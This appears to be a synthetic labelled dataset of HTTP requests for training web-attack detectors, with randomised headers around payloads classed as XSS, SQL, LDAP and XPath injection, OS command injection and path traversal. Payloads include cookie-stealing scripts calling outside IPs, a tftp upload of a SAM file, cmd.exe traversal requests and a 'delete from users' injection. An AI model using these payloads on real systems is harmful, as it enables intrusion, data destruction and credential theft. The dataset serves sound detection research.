Warning: 110 www.nsio.html "gbuonm" "Sun, 29 Jul 07 09:27:30 CET"
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 14947
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48741
Start - Id: 47748
class: XSS
GET /Tjrv/rVghCEtyQ8XaL0rN/j3/dng9ySJzDSFzqYY1Sm/iT.mt_H0uA2n/-nQ2Kd6-7group byJz7/msccw.pl?1eehh=4742&q5yk1pV2wF=%5Cen&aoR=%3Cstyle%3E%3C%21--%3C%2Fstyle+++%3E%3Cscript%3E%5Bwindow.open%28%27http%3A%2F%2F12.21.158.218%2Fdeicse.bin%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+%3E&sos=07005&tDerome6hlrjzne=354&Te5hLuhplzup=wRkdi%27ecbeaIl HTTP/1.1
Host: www.e2nt7t.fr:5
Connection: elnnb
Accept: */*;q=0.8
Accept-Charset: cp-950;q=0.3, iso-8859-15;q=0.8, ks_c_5601-1987;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: y3niSsit=yDldso
Client-ip: 58.135.32.75
Cookie: eerbneUse=)asse7union2m
Cookie2: $Version="00"
Date: Wed, 23 Dec 09 03:48:47 UTC
ETag: "7talGQPBsmJ_AaAgn"
Expect: 100-continue
From: timd@onRl.biz
If-Modified-Since: Wed, 22 Feb 06 11:48:37 UTC
If-Unmodified-Since: Wed, 18 Nov 09 23:33:03 UTC
If-Match: "ztaZzhDtm3BqBDYbIuK"
If-None-Match: *
If-Range: "89r0YXzcL2t1Y-JhR"
Max-Forwards: 0146
MIME-Version: 7.7
Pragma: stt6=4aNi
Proxy-Authorization: NTLM cmMwdWFPOUNuckxhZHJoZmxubG92YXQ0cmFhbGloanNlbkU=
Authorization: 6lRTvt et6rdy=hgrgone
Range: -887125,6715-3229
Referer: http://siTta.org/ddsnnot.mdb
TE: trailers
Trailer: Date
User-Agent: nilstatwtsdsoaer6eza
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0710x100
Via: 9.4 92.11.81.124
Transfer-Encoding: identity
Upgrade: sji/4.0, asq/5.9, arzh/5.3
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 198.120.124.208
X-Serial-Number: 75850540029155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47748
Start - Id: 46641
class: XSS
GET /rechot/tr4N3SjKnnLBIlDIy/dAMOivUg84dGrSNff4K/aewhswnoeNc/seioo6etr/sOnulye/df4XSLJze_/ouVmWi.php3?tnqe=neFhbn%40t%29%3B6%27ia+&Oerr7ehbilnraei=mrwt5&i2eyino1mc=mlor&gvtttu5orv2=t&A@c7SY9YMb=381342&LqrSesn9m=a%3D&5v5PNTXzP=mnsdenethwoshea&ats=tslT+eae%3Aub0is%40%28ce&ytetlo0mtexoeS=h%3DaqteuOvna%3CilLuttoE HTTP/1.1
Host: www.r1b3e.ch
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: <img    dynsrc    =  "   javascript:    [window.open('http://129.206.57.218/nato.sh'+document.cookie);]  "   >
Accept-Language: txewe9ch-ind0g
Cache-Control: no-cache
Client-ip: 173.63.25.136
Cookie: osoI89=acceptcEtasuue;onlFqxaan=5N0b;od6turaiVstjw=88950
Cookie2: $Version="007"
Date: Fri, 11 May 07 18:15:55 GMT
ETag: "Eur9H_NKXYCh-Wi0X"
Expect: d6ab
From: iuaea@cvOyle.it
If-Modified-Since: Sun, 07 Mar 10 08:33:50 CET
If-Unmodified-Since: Mon, 14 Jun 04 13:27:06 CET
If-Match: *
If-None-Match: "XgHaQqjfqaM@UO5zdT"
If-Range: "W.pw8P2ncXl5RCuDT"
Max-Forwards: 8385
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic YW9kdFRlZTpjY2Vs
Authorization: Digest nc=ba24d2A6
Range: 118-482,-132
Referer: http://oglato.uk/rsdrrmf/alOlrian.php3
TE: trailers,trailers,deflate;q=0.2
Trailer: Via
User-Agent: nvberrejisor6mtn0gt
UA-CPU: PowerPC
UA-Disp: 5349,685,16
UA-Pixels: 4819x5235
Via: ehLerY/1.6 84.38.170.152:74, FTP/6.9 www.em5r.html, orie0/5.1 50.201.58.124
Transfer-Encoding: compress
Upgrade: Ecza/9.5
Warning: 757 108.116.185.191 "ocitEnelehtRjoDnesur" 
X-Serial-Number: 4075489
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46641
Start - Id: 37486
class: LdapInjection
GET /orsryaaoeiS/hWWjjaI@Idvt8wCxm/7wBzdOkbDtD5kAaxOQh/JPoptna9Taccess_log/Mn@58.php4?nttlzemsrimcc=qmuTs+adminavipl&afNTxp_=4668553&shll9=%25ues7oyto%2Fauot&8rhwonaa=nirtakrstgct7&eviaweidsbdbse=Z8fe9ftdo&ntesramarh=wwme4&9xayqr9leIu=MaiwEaoolAt3hh&YotP-IAU_O=tpasswdsock_stream6adocumentpsh&acl=7ZFta%40&1e3B3=ailf3rx&tngrile=l%28 HTTP/1.0
Host: 1.234.38.44
Connection: keep-alive
Accept: text/*;q=0.6, application/*;q=0.8, application/x-tar
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.2, gzip;q=0.9, gzip, identity
Accept-Language: otscosa-r;q=0.3
Cache-Control: jeadoEe='osAleene'
Client-ip: 13.68.217.115
Cookie: ym0oenuoc=ne5;onaugeeoEo6qure=ar7)(&(objectClass =    jgw*);il=xnIIYtyhdQ;moeinatrb88lir=tsnu
Cookie2: $Version="597"
Date: Tue, 12 Aug 08 19:13:36 GMT
ETag: W/"pUTdFG5mc5rYfK_N"
Expect: ypi6=lslel
From: efeoeoRf@ls4i3oHl7.cz
If-Modified-Since: Fri, 28 Sep 07 16:51:02 GMT
If-Unmodified-Since: Wed, 11 Oct 06 05:26:35 UTC
If-Match: *
If-None-Match: "pXk0t@gyan8iLU1gDE"
If-Range: Sat, 19 Aug 06 23:26:48 CET
Max-Forwards: 61
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: igibl usincu=8tit
Authorization: Digest nc=daAe10B7
Range: 17-,27656-91,-6492
Referer: /raahvn/9roeo/tsaU0u.avi
Trailer: Warning
User-Agent: iema3iahEM/1.8
UA-CPU: x86
UA-Disp: 1808,958,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3223x693
Via: FTP/2.0 101.13.174.18, HTTP/6.3 www.rhEaoct.gif, iret/9.3 80.119.157.215
Transfer-Encoding: deflate
Upgrade: dtrii/0.5, 5nNo/4.5, nu4oas/1.3
Warning: 467 100.224.144.169 "tnaiAtneptehnz6ndIrt" "Sun, 07 Dec 08 02:23:15 CET"
X-Forwarded-For: 139.237.65.5
X-Serial-Number: 66647451620
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37486
Start - Id: 44597
class: OsCommanding
GET /z57ZMCCd-Ntbin/hiHeecrtrsitiJc6ra.aspx?xtuieTvo=DActceeLnfeeOqbeem&oWt=954&iIE8ltd=24067&ou2i7aaotaieno=passthruego%3Aokdeiframe%25&Zgs-ZE3EDr=0o&teeehT=+8%2B%2Fg&8e7ac=56.126.115.83+++++%7C+++tftp+++++-i++++200.57.82.112++PUT+sam._&o0loonbodii=6j5%5C6%3Deolh HTTP/1.0
Host: www.eknfcawnee.uk
Connection: zhsy
Accept: */*
Accept-Charset: cp-932;q=0.1, gb2312
Accept-Encoding: 
Accept-Language: hbnog-mDL
Cache-Control: no-store
Client-ip: 97.130.78.86
Cookie: ci=47291;eratrvli=nfh0z.g9GPO;tn0=os3tiedttMsseaw;pstg2js5iutsu=910;winnttMJlf=uiq mopt
Cookie2: $Version="67"
Date: Thu, 27 Apr 06 22:44:49 CET
ETag: W/"EceresNnukYMbJqcg@"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Sat, 31 Oct 09 05:38:24 UTC
If-Unmodified-Since: Tue, 04 Nov 08 06:34:13 CET
If-Match: *
If-None-Match: "a77IGwIzKiU4Q3YYEu"
If-Range: Tue, 06 Apr 04 14:46:39 GMT
Max-Forwards: 7947
MIME-Version: 1.7
Pragma: dmpst='nohhosV'
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: iendrI etxinE=oeBI
Range: -2578
Referer: http://T6ns4.uk/EseUm/s2sn/cDio/arTdc.txt
TE: trailers,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: sKU7uylVy http://www.a3tdz.ch
UA-Disp: 0488,6492,16
UA-Color: color32
UA-Pixels: 905x8117
Via: 1.3 www.drhp.htm, 6.8 237.35.251.140
Transfer-Encoding: gzip
Upgrade: sraa/8.7, apdat/7.5, Eir8/9.0
Warning: 099 188.171.255.136 "sresnpusmMne" "Wed, 01 Apr 09 06:36:17 GMT"
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44597
Start - Id: 49660
class: XPathInjection
GET /nkcoennuOskraws7rr/rourleaarlryclne/PGlmw/hEltyn8ereLnLb2pt.tiff?dyue50ah=t%3F%26otu&QhavingE78LS=%28i+++++%3C+++count%28i9ie%2Fchild%3A%3Atext%28%29%29+++++and++j+++%3C+count%28hdh%2Fchild%3A%3Acomment%28%29%29+++and++++k+++%3C+++count%28rjerh%2Fchild%3A%3A*%29+%29&duN.UH=tsdnrs%7Enihf&i2eit=e%40J3jtXh0-ze&r1r6esodf=ce&RV26Hlink=bn&lrtanitdeot=c+os8isveReso HTTP/1.1
Host: www.ocsavNeRta.cz:41824
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.5
Accept-Language: *
Cache-Control: min-fresh=45
Client-ip: 159.125.158.213
Cookie: Dyamsgroup byLE=yr5u=oa8tmptn ylnullrrm&;5GaYbfryNnph-hm=tz;eoniiShotIievnD=wnucsmnfevbnlndc;BRKnqbpMGZ2=tYfwF3;amamrmHoHcn3=043;ltaoir=ftWJ2m9
Cookie2: $Version="12"
Date: Mon, 25 Sep 06 04:36:45 GMT
ETag: W/"tMSsJ3bLqozrYkMJ"
Expect: httd
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Wed, 22 Sep 04 13:56:17 UTC
If-Unmodified-Since: Sat, 19 Nov 05 03:19:41 UTC
If-Match: "ztLNDQteWb3GoLPJuof"
If-None-Match: *
If-Range: Mon, 29 May 06 13:48:30 GMT
Max-Forwards: 1119
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 7083-858216,-723,8872-
Referer: http://srnel.it/eosseedE.php3
TE: trailers,gzip;q=0.6
Trailer: Date
User-Agent: Mozilla/6.3 (X11; U; Open BSD i586 2.9; ei-te; rv:6.4.2) Gecko/28790512
UA-CPU: PowerPC
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 668x5866
Via: 5.4 129.10.237.16
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 513 www.ktnk.jpg:6554 "fvdleet" 
X-Forwarded-For: 113.186.2.179
X-Serial-Number: 38921697
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49660
Start - Id: 36473
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 179.19.200.155
Connection: close
Accept: */*;q=0.1
Accept-Charset: shift_jis;q=0.6, utf-7, x-mac-korean, cp-932;q=0.5, x-mac-roman
Accept-Encoding: 
Accept-Language: 2mistos8-YAota, zemR-eEe, ctac-jsEhtue;q=0.9
Cache-Control: eehOuan='rsh'
Client-ip: 4.98.22.198
Cookie: lcqhdrhtcrha5yl=n0rptheohgioesoin4;NWEE0g.jmconnectSr=eon69is;waeaeieithme=osock_streamm;a8=ei0B;hia4eEieteHrahh=osqsnat8
Cookie2: $Version="987"
Date: Sun, 27 Aug 06 17:55:32 CET
ETag: "eHNFlmWlO@M8y5SACU7"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Mon, 04 Jul 05 22:45:41 GMT
If-Unmodified-Since: Sat, 03 Jun 06 24:36:41 GMT
If-Match: "QZD.TK-Qom_HbzY_.p"
If-None-Match: *
If-Range: *
Max-Forwards: 436
MIME-Version: 9.8
Pragma: wdlddr='EhEx'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM bHBzYWVzaGVBdXcycmhkQXNvbG9PYmVPSW0zZU1rRVJhZXo=
Range: 57-,410056-,436232-1281
Referer: http://www.qanroml1.ch/reirqsih/w6faat7e/nuahtieh/3lafahi.pdf
TE: deflate,trailers,trailers
Trailer: Accept
User-Agent: t0HTu26 http://www.vmlO.org
UA-CPU: Sparc
UA-Disp: 8174,3331,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: HTTP/7.5 250.189.133.153
Transfer-Encoding: identity
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36473
Start - Id: 43871
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 150.178.253.202
Connection: keep-alive
Accept: video/mpeg;q=0.0
Accept-Charset: windows-1254;q=0.9, iso-8859-7;q=0.3, windows-1253;q=0.5
Accept-Encoding: *
Accept-Language: raah-Staojy;q=0.1, jiM9-ra5a;q=0.1, rh-aqs
Cache-Control: max-age=63
Client-ip: 132.134.82.134
Cookie: fihMateayhssdt=939
Cookie2: $Version="4"
Date: Sat, 18 Jul 09 24:45:44 CET
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 16 Jan 06 22:22:18 GMT
If-Unmodified-Since: Sun, 25 Sep 05 05:41:40 GMT
If-Match: "t-nu44CIJ9zpgSAjN0t"
If-None-Match: "2tQcTKqYyF0azjzu"
If-Range: Sun, 07 Aug 05 24:59:34 CET
Max-Forwards: 26
MIME-Version: 1.9
Pragma: fAttmFml='s4a'
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: lSOune xeikcnEt=6xsrh
Range: 91796-,027282-114595
Referer: http://dn14oes.org/ctchtn/oehke/wie4/Aenies/ls3rGf7v.fgf
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.1 (Machintosh; U; PPC Mac OS X 2.8; le-ir; rv:8.0.6) Gecko/23528049
UA-CPU: Sparc
UA-Disp: 7852,060,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/7.1 www.dsOpFhe.jpg:988, FTP/1.3 www.fndeeYt.html, HTTP/6.4 222.118.147.81:4
Transfer-Encoding: 1qsm; vrjcoda9=adoeErc7
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 271 62.138.196.100 "8z8l8ou" "Tue, 21 Feb 06 05:57:12 CET"
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 42257
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43871
Start - Id: 48530
class: XPathInjection
PUT /lirneEd5h/z6wtwoachhots/be-aLVQYRoSe9uswS/yqonematssUeitTtdp/sL75I9RoLiWMN/ryjWnhELCrmiw1_.wZV3/5xterm1KwcopyVOlat6V/trw/cwlnltjdaimcs/tVDNA/nlttqEpehsbgtI11.jpg? HTTP/1.1
Content-Length: 122
Content-Language: 0oldusA,ohf
Content-Encoding: identity
Content-Location: http://7ap2.de/gfrt/rnN0.png
Content-MD5: ZWlhZW8yZWw4aWw1RGVpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Sep 05 16:15:14 UTC
Last-Modified: Sat, 08 Aug 09 05:59:30 CET
Host: 71.92.1.39
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, gzip, compress
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 229.67.89.201
Cookie: erb=rno6arn;e8fNyedo=li6;F1X.zorWpvYiH=a
Cookie2: $Version="5"
Date: Wed, 07 Mar 07 09:45:47 CET
ETag: W/"tBZi-pENw9GtkAl"
Expect: 100-continue
From: hpeced@ekqiej.it
If-Modified-Since: Fri, 03 Aug 07 16:03:48 CET
If-Unmodified-Since: Mon, 11 Sep 06 04:36:49 UTC
If-Match: "BOjIfGZGn9WdOo6G"
If-None-Match: *
If-Range: "5Lhgk9biuM8pQYQ"
Max-Forwards: 63
MIME-Version: 9.6
Pragma: aScsv='Tha8eBn'
Proxy-Authorization: mtlwdi eSfIe=ftEqwcOT
Authorization: Digest response="C19cB6D9F6aAeED5efaDaa9ACDB2Ffc2"
Range: 51-93,35-2637,65821-
Referer: /eU0sle.msf
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: teineqcj (u_5K4-XQa; rV2HMPZ_2C; 8OrgBKT7z)
UA-CPU: x86
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3038x174
Via: FTP/6.9 www.rl22ie.jpeg
Transfer-Encoding: gzip
Warning: 437 242.254.172.181 "wwyyel6" "Tue, 23 Aug 05 14:58:53 GMT"
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nnh=eNt/wioy/js/child::node()[position()=80]   or     '3asBcf'  =   '&1ua6smxaonn=63122254

End - Id: 48530
Start - Id: 36003
class: PathTransversal
POST /erLM8EiHZA-JfkEd0/kGa/4ixBIW4/t7Tuemi6gr/APCvin6fG20IsU/see/sBJQ59zDl48@/remraoe/eOTVs1nPybfgEtX5/fdVlinkQl0Z.jpeg? HTTP/1.0
Content-Length: 240
Content-Language: lenlb,cr,H7eahiwo
Content-Encoding: deflate
Content-Location: /flgrNb/thnejas/nn8r/s2tzzid.gz
Content-MD5: c3Nob2xseG5uc2FycmhyYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Oct 09 10:51:53 UTC
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: www.chnq24.com
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.6, iso-2022-kr;q=0.2, hz-gb-2312, euc-tw;q=0.6
Accept-Encoding: compress;q=0.8, compress, deflate;q=0.1, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 241.137.194.133
Cookie: ee3tn9s6smte8=dn8vtRbmtotah;ifnedhhotljgr=tossxilcrefn
Cookie2: $Version="232"
Date: Tue, 07 Apr 09 20:44:47 CET
ETag: W/"WcuTKJ-E0lIjdULM"
Expect: ueoc69
From: rA7tR@tqia61e.ch
If-Modified-Since: Sun, 05 Dec 04 18:23:33 UTC
If-Unmodified-Since: Mon, 19 Jun 06 20:40:34 GMT
If-Match: "g3hSHF7eEkHdVD8"
If-None-Match: *
If-Range: Mon, 10 Dec 07 22:40:25 GMT
Max-Forwards: 5
MIME-Version: 5.1
Pragma: d6x='n5'
Proxy-Authorization: NTLM YXRlb2F1ZHJFMWhvaWVlbHJzTHRYZWU3MWRkb29nb3Q=
Authorization: NTLM cm9taUFwYzFibDk2c1RlaXMyc2hoNG5yYWhldXN4bmV0ZQ==
Range: -22147
Referer: http://www.osdna.de/waianels/ttdi/rneoI.cfm
TE: trailers,gzip,chunked
Trailer: Accept
User-Agent: tgul (aZYzsdC)
UA-CPU: 68000
UA-Disp: 2185,9932,16
UA-OS: Win98
UA-Pixels: 551x993
Via: 1.1 231.169.214.196, 2.7 105.213.1.233, 0.1 www.owoo7t.css
Transfer-Encoding: identity
Upgrade: Aeae/7.7, asLuh/9.6
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 88.215.245.58
~~~~~: ~~~~~~~~~~

Citr5ao7ddtHfn=et<snd+l&ml06o7bot=95451296&zfouhn6Ecnr=o1n7&hEihtlrnoM1l=../../../../../../WINNT/autoexec.bat&Ihornb=%&enkfawctlxndi=ni0o_T&ueatieoidt5n=46&0TmbVwp-wrmvyQ=p9LEcCT&d1Sipkgmoi=frBe&dcllsnortekps=tdn5ss1ioee

End - Id: 36003
Start - Id: 43936
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.rnode.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity, deflate;q=0.3, gzip, gzip;q=0.5
Accept-Language: *
Cache-Control: iiAehra7='oe'
Client-ip: 203.44.173.36
Cookie: 0lTbeepccarme=68476;ubiangqa9=7982;dcoeoenicltmhox=pk=eaccess_loger5D;dxellJn0ae2seiN=5;iH=betweenTMzuenuaararrs
Cookie2: $Version="4"
Date: Fri, 30 Jan 09 19:01:16 UTC
ETag: "FKkc6IzcbEuCntMpiq"
Expect: 53qdsl=8yhants;n1ncn=wiiOf
From: 1mrsvi@GkweMt.fr
If-Modified-Since: Mon, 16 Nov 09 09:40:27 UTC
If-Unmodified-Since: Mon, 22 Oct 07 12:00:02 CET
If-Match: "D2.z7TCFzeJ0kUrcB7SJ"
If-None-Match: *
If-Range: Wed, 28 Apr 10 16:15:48 GMT
Max-Forwards: 061
MIME-Version: 3.4
Pragma: l=t
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: NTLM QWhESWxkZ3lubHNJd3l3eWhkeVJvYWFlb3JtbnBhU2FhZjJlZXp1bm5jZQ==
Range: 080946-24031
Referer: http://aazdU.org/osemGqu/grqss.js
TE: deflate;q=0.4,trailers,deflate
Trailer: If-None-Match
User-Agent: ehhsl8eyct/1.6
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 8.1 www.ROtu.gif
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 306 www.z5ho.jpg:47 "ihusrziuEUas" "Tue, 03 Apr 07 20:01:51 CET"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43936
Start - Id: 44963
class: PathTransversal
GET /9wueeR/kceLctAhesboaoyrkr/s5o6/dboonC8KN.cfm?inh8rmeeeod=38&Jsan0hlnnmeoneq=..%2F..%2F..%2Felin%2Fadmin.txt&bd9sle2=eQB&hlTost1nh=4997 HTTP/1.1
Host: www.zmarrnm1e.it
Connection: close
Accept: audio/*, video/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: eiucli-oa;q=0.6, 6osi14e-tl6Hbmc
Cache-Control: eEc='uch'
Client-ip: 141.6.207.75
Cookie: btz=998;ri29itqihAelex=723979;eo=9;Nhr0doaddeseokn=8selreeesetssc
Cookie2: $Version="02"
Date: Tue, 06 Apr 10 09:02:57 GMT
ETag: W/"@Ha_U7Oeumx8BwDN1Ut."
Expect: 100-continue
If-Modified-Since: Sun, 15 Jan 06 10:48:12 UTC
If-Unmodified-Since: Fri, 10 Jun 05 11:58:57 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Jul 08 15:39:37 CET
Max-Forwards: 95
MIME-Version: 0.8
Pragma: l4hrjfnb=he
Proxy-Authorization: NTLM ZWhkeDZyMW1hQTFyZGROZm5pdnNTZWx0cnRlb293b2FydkR1OXQ=
Authorization: Digest nonce
Range: 692467-8,088341-5,956298-14
Referer: http://iieta.st/3aoeoheu/BeDpnm/yotrtCpT/rez1.fgf
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: no4pelxsewePun
UA-CPU: Sparc
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 298x509
Via: 1.0 16.3.246.115, FTP/1.4 www.muc4tsEs.htm
Transfer-Encoding: deflate
Upgrade: mAelaA/3.4, 5lote/9.4, GsasM/7.6, ho40u/4.6, tead/1.7
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 9376895954650597
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44963
Start - Id: 43241
class: OsCommanding
GET /n09NE9A1IINhyt/ixmtMm/t0tsSoi00r/i2acien1ht5haioeItT.tiff?e6qCln5cdas4tog=tRy&qUZbgsound=n%5CItjtte&hngseowmSopbsl=94434&1owendn=%2Fbin%2Fps%2500+++%7C&nSr3arlaltpw=ey%2Boej&iBaNw38hwnr=mohodle4rcrutomhe&ftxdUuiAet2hifi=oigc4&ecass=nn+fbetweensO2&ecmehxt=sa&Et=mR%26s1ahh29 HTTP/1.1
Host: 246.216.6.3
Connection: apdb
Accept: application/*, text/html;q=0.1, audio/basic;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 36.195.182.59
Cookie: tdvetLlri7Na=50442;Ooet=2tdfrid9g2ret3dey9;rvm2ei9m8eis='itm;metaonullbwQrboot.ini.n=aidcn;ez5caaa7c=194
Cookie2: $Version="086"
Date: Sat, 05 Jul 08 08:15:05 CET
ETag: "ePNHX-Y7qrhSs.I2Ye5P"
Expect: ioiitno=sbij
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Fri, 25 Mar 05 02:46:54 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Sep 07 08:34:25 CET
Max-Forwards: 75
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ckts natesru2=rltfdnt
Range: -330,06836-
Referer: http://www.oozpbe.de/nedUatfY/oAagoubo/mTarqet/thOooae/fwexls3c.php4
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: ioetnsesei/8.0.0.0.1
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: FTP/3.7 4.96.247.82, HTTP/8.9 www.2xxAl.html, esikn/8.8 www.to6hea.tiff
Transfer-Encoding: deflate
Upgrade: rIi/9.2, idmtlp/9.9
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 173.145.188.232
X-Serial-Number: 3809752703652
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43241
Start - Id: 41868
class: SqlInjection
GET /eS/5dI9/s1z6ZR-yM8sfA.z.AiGs/oyKZLzNtjrv3AaFq.Gc/dm/eeetashrdns1tp5Tsnr/ly5nE-O7k3XRFcgcM6/KW@/i-5krQtQ_BVfpNI8j/qKE6poEHNEoGu.39A/Y24gqhhtacces.pl?eurulr=07237758&htaoliigca=lddoe&Hm1ai6=-sedHdev&oB__unionGvMEbj=520077&ecdHaTna9H=%27++++%29%3B+++delete+++from+users%3B+++commit%3B++++dummy%28++++%27&pey1Ta=%3COstdin+%27%27bnktusW&hx7obTRma=tt&aue6lwedz=m%28prlNao&BjCfmrghaua=hhTivTKOz&enN3fshlarosge=saa&evretcr=%24cHin&Oheyneai1si=69064&lsristsIn3tn=nGzeou2eOeehA HTTP/1.1
Host: www.uhiiri.com
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8;q=0.7
Accept-Encoding: deflate;q=0.1
Accept-Language: *
Cache-Control: max-age=41427
Client-ip: 174.237.136.128
Cookie: dnaeqDiQu=cn;h8rr=welsoaheo5cea;7sahmohe=ilp
Cookie2: $Version="776"
Date: Wed, 09 Nov 05 04:17:31 UTC
ETag: W/"NB8ujNmt0uyX._sVfglF"
Expect: hkedgyn
From: alubns@ssude.cz
If-Modified-Since: Sat, 02 Jan 10 24:30:58 UTC
If-Unmodified-Since: Fri, 08 Feb 08 01:48:16 CET
If-Match: *
If-None-Match: "t6mszVq2X.btelb"
If-Range: *
Max-Forwards: 02
MIME-Version: 7.2
Pragma: nFroini=ooc
Proxy-Authorization: hruhs OR2omeK=eaefp
Authorization: cerhke srest=lwcshsc
Range: -521,-331719
Referer: /hden/tvaksi/eOmso/fauDxs/oredn.ace
TE: trailers,deflate;q=0.3,trailers
Trailer: If-Unmodified-Since
User-Agent: m1sOrtl/9.8.2.5
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: 2.6 28.142.120.233, HTTP/5.7 www.8esE.html, FTP/7.0 www.tneef.htm:47165
Transfer-Encoding: wlhee
Upgrade: prc/4.5, 2sFe/0.3
Warning: 392 113.130.15.37 "8vRtmnhtkaGbbhnilg" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41868
Start - Id: 37931
class: LdapInjection
